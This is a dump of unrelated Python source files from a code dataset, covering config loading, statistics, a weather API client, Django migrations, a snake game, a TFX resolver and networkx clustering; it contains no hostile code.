return default
def load_config_file():
''' Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner '''
p = SafeConfigParser()
path0 = os.getenv("SOJOURNER_CONFIG", None)
if path0 is not None:
path0 = os.path.expanduser(path0)
path1 = os.getcwd() + "/sojourner.cfg"
path2 = os.path.expanduser("~/.sojourner.cfg")
path3 = "/etc/sojourner/sojourner.cfg"
for path in [path0, path1, path2, path3]:
if path is not None and os.path.exists(path):
try:
p.read(path)
except configparser.Error as e:
print("Error reading config file: \n{0}".format(e))
sys.exit(1)
return p
return None
def shell_expand_path(path):
''' shell_expand_path is needed as os.path.expanduser does not work
when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE '''
if path:
path = os.path.expanduser(os.path.expandvars(path))
return path
p = load_config_file()
active_user = pwd.getpwuid(os.geteuid())[0]
# sections in config file
DEFAULTS='defaults'
# configurable things
# def get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):
DEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS, 'sojourner_home','DEFAULT_SOJOURNER_HOME',os.environ['HOME']+'/Sojourner'))
DEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine', 'SOJOURNER_DB_ENGINE', 'sqlite')
DEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST', 'localhost')
DEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT', '3306')
DEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER', 'sojourner')
DEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd', 'SOJOURNER_DB_PASSWD', 'sojourner')
DEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname', 'SOJOURNER_DB_DBNAME', 'sojourner')
SOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner', 'SOJOURNER_PROVISIONER', 'ansible')
# ANSIBLE RELATED
SOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles', 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')
# CHEF RELATED
SOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks', 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')
|
8,045 | 647258ee5f2f6f1cb8118bcf146b8959c65b70cd | import numpy as n, pylab as p
from scipy import stats as st
a=st.norm(0,1)
b=st.norm(0.1,1)
domain=n.linspace(-4,4,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffN=n.abs(avals-bvals).max()
a=st.norm(0,1)
b=st.norm(0,1.2)
domain=n.linspace(-4,4,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffN2=n.abs(avals-bvals).max()
a=st.uniform(0,1)
b=st.uniform(0.05,1.0)
domain=n.linspace(0,1.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffU=n.abs(avals-bvals).max()
a=st.uniform(0,1)
b=st.uniform(-0.05,1.05)
domain=n.linspace(0,1.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffU2=n.abs(avals-bvals).max()
#a=st.weibull(1.5)
#b=st.weibull(1.7)
#domain=n.linspace(0,1.05,10000)
#avals=a.cdf(domain)
#bvals=b.cdf(domain)
#diffW=n.abs(avals-bvals).max()
#a=st.power(1.5)
#b=st.power(1.7)
#domain=n.linspace(0,1.05,10000)
#avals=a.cdf(domain)
#bvals=b.cdf(domain)
#diffP=n.abs(avals-bvals).max()
#x = n.arange(1,100.)/50.
x=n.linspace(0,20,100000)
step=x[1]-x[0]
def weib(x,nn,a):
return (a / nn) * (x / nn)**(a - 1) * n.exp(-(x / nn)**a)
#count, bins, ignored = p.hist(n.random.weibull(5.,1000))
#x = n.arange(1,100.)/50.
#scale = count.max()/weib(x, 1., 5.).max()
W=weib(x, 1., 1.5)
W_=W/(W*step).sum()
W__=n.cumsum(W_)
W2=weib(x, 1., 1.7)
W2_=W2/(W2*step).sum()
W2__=n.cumsum(W2_)
diffW=n.abs(W_-W2_).max()
#p.plot(x, W_)
#p.plot(x, W2_)
##p.plot(x, weib(x, 1., 5.)*scale)
#p.show()
a=st.powerlaw(1.5)
b=st.powerlaw(1.7)
domain=n.linspace(0,5.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffP=n.abs(avals-bvals).max()
print("distancias de KS para os modelos matematicos:", diffN,diffN2,diffU,diffU2,diffW,diffP)
# distancias de KS para os modelos matematicos:
# 0.0398776116762 0.0439947104098 0.0952338090952 0.047619047619 0.128565475845 0.0460149130584
# X = (-n.ln(U))^{1/a}
lb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7
x=n.linspace(lb,rb,NE)
step=x[1]-x[0]
W=weib(x, 1., shape1)
W_=W/((W*step).sum())
W__=n.cumsum(W_)
W2=weib(x, 1., shape2)
W2_=W2/((W2*step).sum())
W2__=n.cumsum(W2_)
diffW=n.abs(W__-W2__).max()
lb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7
x=n.linspace(lb,rb,NE)
step=x[1]-x[0]
W=weib(x, 1., shape1)
W_=W/((W).sum())
W__=n.cumsum(W_)
W2=weib(x, 1., shape2)
W2_=W2/((W2).sum())
W2__=n.cumsum(W2_)
diffW=n.abs(W__-W2__).max()
|
8,046 | 94540561ba29d2fc1766dac7b199e0cbbbeecdfc | # name: Ali
# date: 7/12/2016
# description: uses openweathermap.org's api to get weather data about
# the city that is inputted
# unbreakable? = idk
import json
import urllib2
from collections import OrderedDict
from pprint import pprint
api_key = "&APPID=507e30d896f751513350c41899382d89"
city_name_url = "http://api.openweathermap.org/data/2.5/weather?q="
units = "&units=metric"
general_info = {
"Humidity (%)": 0,
"Pressure": 0,
"Temperature(C)": 0,
"Max. Temp.(C)": 0,
"Min. Temp.(C)": 0
}
def connectapi():
global parsed
global data
urlrequest = city_name_url + city_input + units + api_key
response = urllib2.urlopen(urlrequest)
content = response.read()
data = json.loads(content, object_pairs_hook=OrderedDict)
parsed = json.dumps(data, indent=4, sort_keys=True)
print parsed
def find_data():
global country_name
global city_name
global general_info
global weather_description
global formatted_general_info
city_name = str(data['name'])
country_name = str(data['sys']['country'])
#weather_description = data['weather']['description']
for key, value in data['main'].iteritems():
if key == "humidity":
general_info['Humidity (%)'] = value
elif key == "pressure":
general_info['Pressure'] = value
elif key == "temp":
general_info['Temperature(C)'] = value
elif key == "temp_max":
general_info['Max. Temp.(C)'] = value
elif key == "temp_min":
general_info['Min. Temp.(C)'] = value
else:
continue
print "Weather Lookup\n\nEnter the name of the city that you want\nto look at the weather details of.\n"
while True:
try:
city_input = str(raw_input("What city would you like to look at?"))
except ValueError:
print"Please enter a city name."
connectapi()
if "name" in data:
find_data()
print "\n%r in %r:\n"% (city_name, country_name)
print """General info:"""
pprint(general_info)
print "\nWeather Description:\n\tidk why it doesn't let me take this data so annoying\n"
else:
print "Something went wrong, would you like to try again?"
continue
|
8,047 | f633496f1a7cd562fd41d697a2e26831ceaef479 | __all__ = ["loading"]
from . import loading
|
8,048 | d8df9a9f95a1d4a9aa34987ec1244cc6c0c7c610 | # Generated by Django 2.0.3 on 2018-03-24 07:53
import django.core.files.storage
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('printers', '0001_initial'),
('devices', '0002_url'),
]
operations = [
migrations.CreateModel(
name='Cartridge',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=512)),
('image', models.ImageField(default='cartridge.png', storage=django.core.files.storage.FileSystemStorage(location='./media/images/spares'), upload_to='')),
('in_stock', models.IntegerField()),
('comment', models.CharField(max_length=512)),
('contractors', models.ManyToManyField(to='devices.Contractor')),
('printers', models.ManyToManyField(to='printers.Printer')),
('urls', models.ManyToManyField(to='devices.Url')),
],
),
migrations.CreateModel(
name='Index',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('index', models.CharField(max_length=512, unique=True)),
],
),
migrations.CreateModel(
name='Spare',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=512)),
('image', models.ImageField(default='spare.png', storage=django.core.files.storage.FileSystemStorage(location='./media/images/spares'), upload_to='')),
('in_stock', models.IntegerField()),
('comment', models.CharField(max_length=512)),
('contractors', models.ManyToManyField(to='devices.Contractor')),
('indexes', models.ManyToManyField(to='printer_spares.Index')),
('printers', models.ManyToManyField(to='printers.Printer')),
('urls', models.ManyToManyField(to='devices.Url')),
],
),
]
|
8,049 | 0ad71f02e37f2744036b134c33e037a724fd38a6 | import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import cv2
import openslide
class QualityPatch():
def __init__(self, original_img_path,label_img_path,patch_level,patch_size):
"""
parameter:
original_img_path(str): the source of image
label_img_path(str): label image
patch_level(int): the level that the patch belongs to
patch_size(tuple): size of patch(x,y)
attributes:
self.slide(Openslide): the slide that the patch belongs to
self.original_img_path(str) : the path of the lide
self.label_img_path(str) : label_img_path
self.patch_level(int) : the level that the patch belongs to
self.patch_size = patch_size
self.scale(int) : the magnification of the slide that the patch belongs to with level_max baseline
self.label(np array) : the image of label
self.label_size(tuple) : the size of label
self.adj_patch_size_label(tuple) : considering the slide is rescaled to self.label_size the size is zero, it is 1
"""
self.slide = openslide.OpenSlide(original_img_path)
slide_width, slide_height = self.slide.dimensions
self.label = (cv2.imread(label_img_path,cv2.IMREAD_GRAYSCALE)/255)
self.patch_coors = [(w,h) for w in range(0, slide_width - patch_size[0], patch_size[0]) for h in range(0, slide_height - patch_size[1],patch_size[1])]
self.original_img_path = original_img_path
self.label_img_path = label_img_path
self.patch_level = patch_level
self.patch_size = patch_size
self.label = self.label.T
self.level_dim = self.slide.level_dimensions[patch_level]
self.label_size = self.label.shape
self.scale = (self.label_size[0]/self.level_dim[0], self.label_size[1]/self.level_dim[1])
self.adj_patch_size_label = self.calculateAdjPatchSize()
def calculateLabelCoordinates(self, patch_location):
return (int(self.scale[0]*patch_location[0]/2**(self.patch_level)), int(self.scale[1]*patch_location[1]/2**(self.patch_level)))
def calculateAdjPatchSize(self):
return (int(self.scale[0] * self.patch_size[0])+1, int(self.scale[1] * self.patch_size[1])+1)
def patchQualityInsurance(self, patch_location):
label_coordinates = self.calculateLabelCoordinates(patch_location)
percent = (np.sum(self.label[label_coordinates[0]:label_coordinates[0]+self.adj_patch_size_label[0],label_coordinates[1]:label_coordinates[1]+self.adj_patch_size_label[1]]))/(self.adj_patch_size_label[0]*self.adj_patch_size_label[1])
return percent
def getLabelWithPatchLocation(self, patch_location):
patch_image = np.ones(self.adj_patch_size_label)/2
label_with_patch_location = self.label.copy()
label_coordinates = self.calculateLabelCoordinates(patch_location)
label_with_patch_location[label_coordinates[0]:label_coordinates[0]+self.adj_patch_size_label[0],label_coordinates[1]:label_coordinates[1]+self.adj_patch_size_label[1]] = patch_image
return label_with_patch_location.T
def getReleventPatches(self):
relevent_patches = []
for i, coor in enumerate(self.patch_coors):
percent = self.patchQualityInsurance(coor)
if percent > .5:
relevent_patches.append([coor,percent])
if i % 10000 == 0:
print(i, "/",len(self.patch_coors), "dic len", len(relevent_patches), " from", len(self.patch_coors) )
return relevent_patches
def checkingfunction(self, checking_coors=(40000,90000)):
if checking_coors[0] < 0 or checking_coors[0] < 0 or\
self.slide.level_dimensions[self.patch_level][0] < (checking_coors[0] / 2**(self.patch_level) + self.patch_size[0]) or\
self.slide.level_dimensions[self.patch_level][1] < ((checking_coors[1] / 2**(self.patch_level) + self.patch_size[1])):
raise ValueError("the patch location with patch size is not valid.")
image = self.slide.read_region(checking_coors, self.patch_level, self.patch_size)
percent = self.patchQualityInsurance(checking_coors)
fig, ax = plt.subplots(nrows=1, ncols=3)
plt.tight_layout()
ax[0].set_title("tissue percentage %.02f"%percent)
ax[0].axis('off')
ax[0].imshow(image)
ax[1].set_title("tissue label")
ax[1].axis('off')
ax[1].imshow(self.label.T, cmap='gray')
ax[2].set_title("label with patch")
ax[2].axis('off')
ax[2].imshow(self.getLabelWithPatchLocation(checking_coors))
plt.savefig("test/check_read_region"+str(self.patch_level)+'.png')
plt.close('all')
|
8,050 | d520f9d681125937fbd9dff316bdc5f922f25ff3 | """Seed file to make sample data for pets db."""
from models import db, User, Feedback
from app import app
# Create all tables
db.drop_all()
db.create_all()
# If table isn't empty, empty it
User.query.delete()
Feedback.query.delete()
# Add users and posts
john = User(username="John",password="123",email="24",first_name="12a",last_name="123")
# Add new objects to session, so they'll persist
db.session.add(john)
#have to add users first to not violate foreign key constraints
db.session.commit()
feed = Feedback(title="test",content="alsdkjf",username="John")
db.session.add(feed)
# Commit--otherwise, this never gets saved!
db.session.commit()
|
8,051 | 83815acb0520c1f8186b0b5c69f8597b1b6a552a | #! /usr/bin/env python
from game_calc import *
def game(screen, clock):
running = True
time = 0
WHITE = (255,255,255)
BLUE = (0,0,205)
upper_border = pygame.Rect(12,44,1000,20)
right_border = pygame.Rect(992,60,20,648)
left_border = pygame.Rect(12,60,20,648)
down_border = pygame.Rect(12,694,1000,20)
snake = [(512,344),(512,354),(512,364),(512,374),(512,384)]
direction = 'UP'
bonus_timer = 0
food = new_food(screen, snake)
bonus = None
eaten = True
eaten_cooldown = 1
x_change = 0
y_change = 0
score = 0
font = pygame.font.Font(os.path.join('font.ttf'), 28)
countdown_font = pygame.font.Font(os.path.join('font.ttf'), 100)
up_pressed = False
right_pressed = False
down_pressed = False
left_pressed = False
countdown = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
running = False
if event.key == pygame.K_UP and not direction == 'DOWN' and not right_pressed and not left_pressed:
direction = 'UP'
up_pressed = True
elif event.key == pygame.K_DOWN and not direction == 'UP' and not right_pressed and not left_pressed:
direction = 'DOWN'
down_pressed = True
elif event.key == pygame.K_RIGHT and not direction == 'LEFT' and not up_pressed and not down_pressed:
direction = 'RIGHT'
right_pressed = True
elif event.key == pygame.K_LEFT and not direction == 'RIGHT' and not up_pressed and not down_pressed:
direction = 'LEFT'
left_pressed = True
elif event.type == pygame.KEYUP:
if event.key == pygame.K_DOWN:
None
elif event.key == pygame.K_UP:
None
elif event.key == pygame.K_RIGHT:
None
elif event.key == pygame.K_LEFT:
None
up_pressed = False
right_pressed = False
down_pressed = False
left_pressed = False
if direction == 'RIGHT':
x_change = 10
y_change = 0
elif direction == 'LEFT':
x_change = -10
y_change = 0
elif direction == 'UP':
x_change = 0
y_change = -10
elif direction == 'DOWN':
x_change = 0
y_change = 10
status = check_ahead(screen, snake[0][0]+x_change, snake[0][1]+y_change)
if status == 'NOTHING' or status == 'EAT':
snake.insert(0,(snake[0][0]+x_change,snake[0][1]+y_change))
if status == 'EAT':
eaten = True
eaten_cooldown = eaten_cooldown + 4
food = new_food(screen, None)
score += 1
if random.randint(1,8) == 8 and not bonus:
bonus = new_food(screen, [food])
bonus_timer = 5
if status == 'BONUS':
bonus = None
score += 6
eaten_cooldown += 8
if not eaten and eaten_cooldown == 0:
snake = snake[0:-1]
else:
eaten = False
eaten_cooldown = eaten_cooldown - 1
if status == 'GAME_OVER':
return score
if bonus_timer:
bonus_timer = bonus_timer - (clock.get_time() / 1000)
if bonus_timer <= 0:
bonus = None
bonus_timer = 0
screen.fill((0,0,0))
pygame.draw.rect(screen,BLUE,upper_border)
pygame.draw.rect(screen,BLUE,right_border)
pygame.draw.rect(screen,BLUE,left_border)
pygame.draw.rect(screen,BLUE,down_border)
pygame.draw.rect(screen,(35,142,35),pygame.Rect(food[0],food[1],10,10))
if bonus:
pygame.draw.rect(screen,(255,215,0),pygame.Rect(bonus[0],bonus[1],10,10))
screen.blit(font.render(str(round(bonus_timer,1)),False,(255,255,0)), (200,8))
screen.blit(font.render("Score: " + str(score),False,(255,255,0)), (900,8))
for dot in snake:
pygame.draw.rect(screen,WHITE,pygame.Rect(dot[0],dot[1],10,10))
pygame.display.update()
if countdown:
update_rect = pygame.Rect(500,350,100,100)
countdown = False
for i in range(3,0,-1):
pygame.draw.rect(screen,(0,0,0),update_rect)
screen.blit(countdown_font.render(str(i),False,BLUE), (500,350))
pygame.display.update(update_rect)
pygame.time.delay(1000)
#print(clock.get_fps())
clock.tick(25) |
8,052 | 346df9706dc222f43a77928964cd54e7d999a585 | import discord
class Leveling:
__slots__ = (
'sid', 'channelID', 'message', 'noxpchannelIDs', 'noxproleID', 'remove', 'bot', 'roles')
sid: int
channelID: int
message: str
noxpchannelIDs: list[int]
noxproleID: int
remove: bool
roles: list[list]
def __init__(self, bot, sid, record):
self.sid = sid
self.bot = bot
if record is None:
self.roles = []
self.noxpchannelIDs = []
self.remove = None
self.channelID = None
self.message = None
self.noxproleID = None
else:
self.remove = record.get('remove')
self.message = record.get('message')
self.channelID = record.get('channel')
self.noxproleID = record.get('noxprole')
self.noxpchannelIDs = record.get('noxpchannels') or []
self.roles = record.get('roles') or []
@property
def channel(self) -> discord.TextChannel:
guild = self.bot.get_guild(self.sid)
return guild and guild.get_channel(self.channelID)
async def reload(self):
record = await self.bot.db.fetchrow('SELECT * FROM config.leveling WHERE sid = $1',
self.sid)
self.remove = record['remove']
self.message = record['message']
self.channelID = record['channel']
self.noxproleID = record['noxprole']
self.roles = record['roles'] or []
self.noxpchannelIDs = record['noxpchannels'] or []
|
8,053 | 14807568af046594644095a2682e0eba4f445b26 | # Write a function that receives a string as a parameter and returns a dictionary in which the keys are the characters in the character string and the values are the number of occurrences of that character in the given text.
# Example: For string "Ana has apples." given as a parameter the function will return the dictionary: {'A': 1, '': 2, 'n': 1, 'a': 2, 'r': 2, '.': 1}.
# varianta 1
string=input("Input your string: ")
def funct(string):
dict={}
for i in string:
if i in dict:
dict[i]+=1
else:
dict[i]= 1
return dict
print(funct(string))
# varianta 2
from collections import Counter
def counter():
string=input("Input your string :")
result=Counter(string)
return result
print(counter()) |
8,054 | 2fabb03f0f6b0b297245354782e650380509424b | y = 10
x = 'Тишь да гладь'
print(f'Текст:{x}')
print(f'Число:{y}')
a1 = input('Введите первое число: ')
a2 = input('Введите второе число: ')
b1 = input('Введите первую строку: ')
b2 = input('Введите вторую строку: ')
print(f'Вы ввели числа: {a1}/{a2}')
print(f'Вы ввели строки: {b1} / {b2}')
|
8,055 | d67842c05af9241dbe7e038a9b2dc4223ee7ef4d | # You have an array arr of length n where arr[i] = (2 * i) + 1 for all valid values of i (i.e. 0 <= i < n).
# In one operation, you can select two indices x and y where 0 <= x, y < n and subtract 1 from arr[x] and add 1 to arr[y]
# (i.e. perform arr[x] -=1 and arr[y] += 1). The goal is to make all the elements of the array equal.
# It is guaranteed that all the elements of the array can be made equal using some operations.
# Given an integer n, the length of the array. Return the minimum number of operations needed to make all the elements of arr equal.
def minOps(n):
if n <= 1:
return 0
res = 0
if n%2 == 1:
for i in range(1, n//2 + 1):
res += i*2
return res
else:
for j in range(1, n//2 + 1):
res += j * 2 - 1
return res
def summationMin(n):
return n*n//4
for i in range(10):
print(summationMin(i))
|
8,056 | a91d42764fa14111afca4551edd6c889903ed9bd | # Generated by Django 2.1.3 on 2019-01-06 06:53
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Session",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("token", models.CharField(editable=False, max_length=64, unique=True)),
("description", models.CharField(blank=True, max_length=512)),
("created_at", models.DateTimeField(auto_now_add=True)),
(
"last_seen_at",
models.DateTimeField(blank=True, editable=False, null=True),
),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
),
]
|
8,057 | 2d72f063362aaefdc236e1240020c71bacaf51cf | num = 15850
base = 16
# Primera división
residuo = num % base
cociente = num // base
bit1 = str(residuo)
bit1 = bit1.replace("10","a")
bit1 = bit1.replace("11","b")
bit1 = bit1.replace("12","c")
bit1 = bit1.replace("13","d")
bit1 = bit1.replace("14","e")
bit1 = bit1.replace("15","f")
# Segunda división
residuo = cociente % base
cociente = cociente // base
bit2 = str(residuo)
bit2 = bit2.replace("10","a")
bit2 = bit2.replace("11","b")
bit2 = bit2.replace("12","c")
bit2 = bit2.replace("13","d")
bit2 = bit2.replace("14","e")
bit2 = bit2.replace("15","f")
# Tercera división
residuo = cociente % base
cociente = cociente // base
bit3 = str(residuo)
bit3 = bit3.replace("10","a")
bit3 = bit3.replace("11","b")
bit3 = bit3.replace("12","c")
bit3 = bit3.replace("13","d")
bit3 = bit3.replace("14","e")
bit3 = bit3.replace("15","f")
# Cuarta división
residuo = cociente % base
cociente = cociente // base
bit4 = str(residuo)
bit4 = bit4.replace("10","a")
bit4 = bit4.replace("11","b")
bit4 = bit4.replace("12","c")
bit4 = bit4.replace("13","d")
bit4 = bit4.replace("14","e")
bit4 = bit4.replace("15","f")
print("{} = {}{}{}{}".format(num,bit4,bit3,bit2,bit1)) |
8,058 | 30df17d636c33d2824aad7d7ef6aae7db83615ec | # Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental Resolver for getting the latest artifact."""
from typing import Dict, List, Optional
from tfx import types
from tfx.dsl.components.common import resolver
from tfx.types import standard_artifacts
from tfx.utils import doc_controls
import ml_metadata as mlmd
try:
from tfx.components.evaluator import constants as eval_consts # pylint: disable=g-import-not-at-top
_CURRENT_MODEL_ID = eval_consts.ARTIFACT_PROPERTY_CURRENT_MODEL_ID_KEY
_BLESSED = eval_consts.ARTIFACT_PROPERTY_BLESSED_KEY
except ImportError:
# ml-pipelines-sdk package doesn't have tfx.components.
_CURRENT_MODEL_ID = 'current_model_id'
_BLESSED = 'blessed'
class LatestBlessedModelStrategy(resolver.ResolverStrategy):
"""LatestBlessedModelStrategy resolves the latest blessed Model artifact.
Note that this ResolverStrategy is experimental and is subject to change in
terms of both interface and implementation.
Don't construct LatestBlessedModelStrategy directly, example usage:
```
model_resolver = Resolver(
strategy_class=LatestBlessedModelStrategy,
model=Channel(type=Model),
model_blessing=Channel(type=ModelBlessing),
).with_id('latest_blessed_model_resolver')
model_resolver.outputs['model']
```
"""
def _resolve(self, input_dict: Dict[str, List[types.Artifact]],
model_channel_key: str, model_blessing_channel_key: str):
all_models = input_dict[model_channel_key]
all_models.sort(key=lambda a: a.id, reverse=True)
all_model_blessings = input_dict[model_blessing_channel_key]
# Makes a dict of {model_id : ModelBlessing artifact} for blessed models.
all_blessed_model_ids = {
a.get_int_custom_property(_CURRENT_MODEL_ID): a
for a in all_model_blessings
if a.get_int_custom_property(_BLESSED) == 1}
result = {model_channel_key: [], model_blessing_channel_key: []}
# Iterates all models, if blessed, set as result. As the model list was
# sorted, it is guaranteed to get the latest blessed model.
for model in all_models:
if model.id in all_blessed_model_ids:
result[model_channel_key] = [model]
model_blessing = all_blessed_model_ids[model.id]
result[model_blessing_channel_key] = [model_blessing]
break
return result
@doc_controls.do_not_generate_docs
def resolve_artifacts(
self, store: mlmd.MetadataStore,
input_dict: Dict[str, List[types.Artifact]]
) -> Optional[Dict[str, List[types.Artifact]]]:
"""Resolves artifacts from channels by querying MLMD.
Args:
store: An MLMD MetadataStore object.
input_dict: The input_dict to resolve from.
Returns:
The latest blessed Model and its corresponding ModelBlessing, respectively
in the same input channel they were contained to.
Raises:
RuntimeError: if input_dict contains unsupported artifact types.
"""
model_channel_key = None
model_blessing_channel_key = None
assert len(input_dict) == 2, 'Expecting 2 input Channels'
for k, artifact_list in input_dict.items():
if not artifact_list:
# If model or model blessing channel has no artifacts, the min_count
# can not be met, short cut to return empty dict here.
return {key: [] for key in input_dict}
artifact = artifact_list[0]
if issubclass(type(artifact), standard_artifacts.Model):
model_channel_key = k
elif issubclass(type(artifact), standard_artifacts.ModelBlessing):
model_blessing_channel_key = k
else:
raise RuntimeError('Only expecting Model or ModelBlessing, got %s' %
artifact.TYPE_NAME)
assert model_channel_key is not None, 'Expecting Model as input'
assert model_blessing_channel_key is not None, ('Expecting ModelBlessing as'
' input')
result = self._resolve(input_dict, model_channel_key,
model_blessing_channel_key)
return result
|
8,059 | aace7bc6684f4a9cec2f8fe270b5123a375780af | from string import maketrans
def to_rna(str):
strtrans = maketrans('ACGT', 'UGCA')
return str.translate(strtrans)
|
8,060 | 753e062940e0580d7d33c88c1165977142dcd202 | #!/usr/bin/env python3
def main():
A1, A2, A3 = map(int, input().split())
A=A1+A2+A3
if A >=22:
ans='bust'
else:
ans='win'
print(ans)
if __name__ == "__main__":
main()
|
8,061 | 23a7aa6b9a98bfd4fd43fea1ecfa26cb44969804 | from qcg.appscheduler.errors import *
class Node:
def __init__(self, name=None, totalCores=0, used=0):
self.__name = name
self.__totalCores = totalCores
self.__usedCores = used
self.resources = None
def __getName(self):
return self.__name
def __getTotalCores(self):
return self.__totalCores
def __setTotalCores(self, total):
assert total >= 0 and total >= self.__usedCores
self.__totalCores = total
def __getUsedCores(self):
return self.__usedCores
def __setUsedCores(self, used):
assert used > 0 and used <= self.__totalCores
self.__usedCores = used
def __getFreeCores(self):
return self.__totalCores - self.__usedCores
def __str__(self):
return "%s %d (%d used)" % (self.__name, self.__totalCores, self.__usedCores)
"""
Allocate maximum number of cores on a node.
Args:
cores (int): maximum number of cores to allocate
Returns:
int: number of allocated cores
"""
def allocate(self, cores):
allocated = min(cores, self.free)
self.__usedCores += allocated
if self.resources is not None:
self.resources.nodeCoresAllocated(allocated)
return allocated
"""
Release specified number of cores on a node.
Args:
cores (int): number of cores to release
Raises:
InvalidResourceSpec: when number of cores to release exceeds number of of
used cores.
"""
def release(self, cores):
if cores > self.__usedCores:
raise InvalidResourceSpec()
self.__usedCores -= cores
if self.resources is not None:
self.resources.nodeCoresReleased(cores)
name = property(__getName, None, None, "name of the node")
total = property(__getTotalCores, __setTotalCores, None, "total number of cores")
used = property(__getUsedCores, __setUsedCores, None, "number of allocated cores")
free = property(__getFreeCores, None, None, "number of available cores")
class Resources:
def __init__(self, nodes=None):
self.__nodes = nodes
if self.__nodes is None:
self.__nodes = []
for node in self.__nodes:
node.resources = self
self.__totalCores = 0
self.__usedCores = 0
# print "initializing %d nodes" % len(nodes)
self.__computeCores()
def __computeCores(self):
total, used = 0, 0
for node in self.__nodes:
total += node.total
used += node.used
self.__totalCores = total
self.__usedCores = used
def __getNodes(self):
return self.__nodes
def __getTotalCores(self):
return self.__totalCores
def __getUsedCores(self):
return self.__usedCores
def __getFreeCores(self):
return self.__totalCores - self.__usedCores
"""
Function called by the node when some cores has been allocated.
This function should track number of used cores in Resources statistics.
Args:
cores (int): number of allocated cores
"""
def nodeCoresAllocated(self, cores):
self.__usedCores += cores
"""
Function called by the node when some cores has been released.
This function should track number of used cores in Resources statistics.
Args:
cores (int): number of released cores
"""
def nodeCoresReleased(self, cores):
self.__usedCores -= cores
"""
Relase allocated resources.
Args:
alloc (Allocation): allocation to release
Raises:
InvalidResourceSpec: when number of cores to release on a node is greater
than number of used cores.
"""
def releaseAllocation(self, alloc):
for node in alloc.nodeAllocations:
node.node.release(node.cores)
def __str__(self):
header = '%d (%d used) cores on %d nodes\n' % (self.__totalCores, self.__usedCores, \
len(self.__nodes))
return header + '\n'.join([str(node) for node in self.__nodes])
# if self.__nodes:
# for node in self.__nodes:
# result.join("\n%s" % node)
# return result
def nNodes(self):
return len(self.__nodes)
nodes = property(__getNodes, None, None, "list of a nodes")
totalNodes = property(nNodes, None, None, "total number of nodes")
totalCores = property(__getTotalCores, None, None, "total number of cores")
usedCores = property(__getUsedCores, None, None, "used number of cores")
freeCores = property(__getFreeCores, None, None, "free number of cores")
|
8,062 | bca0baaffefed6917939614defadf9960ffa4727 | class Solution:
# @param num, a list of integer
# @return an integer
def rob(self, num):
n = len(num)
if n == 0:
return 0
if(n == 1):
return num[0]
f = [0] * n
f[0] = num[0]
f[1] = max(num[0],num[1])
for i in xrange(2,n):
f[i] = max(f[i-1],f[i-2] + num[i])
return f[n-1] |
8,063 | a21c132ba9f24ff2c695bf66cae074705025d6b1 | #-*- coding: utf-8 -*-
# Copyright (C) 2011 by
# Jordi Torrents <jtorrents@milnou.net>
# Aric Hagberg <hagberg@lanl.gov>
# All rights reserved.
# BSD license.
import itertools
import networkx as nx
__author__ = """\n""".join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['clustering',
'average_clustering',
'latapy_clustering',
'robins_alexander_clustering']
# functions for computing clustering of pairs
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
def cc_min(nu, nv):
return float(len(nu & nv)) / min(len(nu), len(nv))
modes = {'dot': cc_dot,
'min': cc_min,
'max': cc_max}
def latapy_clustering(G, nodes=None, mode='dot'):
r"""Compute a bipartite clustering coefficient for nodes.
The bipartie clustering coefficient is a measure of local density
of connections defined as [1]_:
.. math::
c_u = \frac{\sum_{v \in N(N(u))} c_{uv} }{|N(N(u))|}
where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
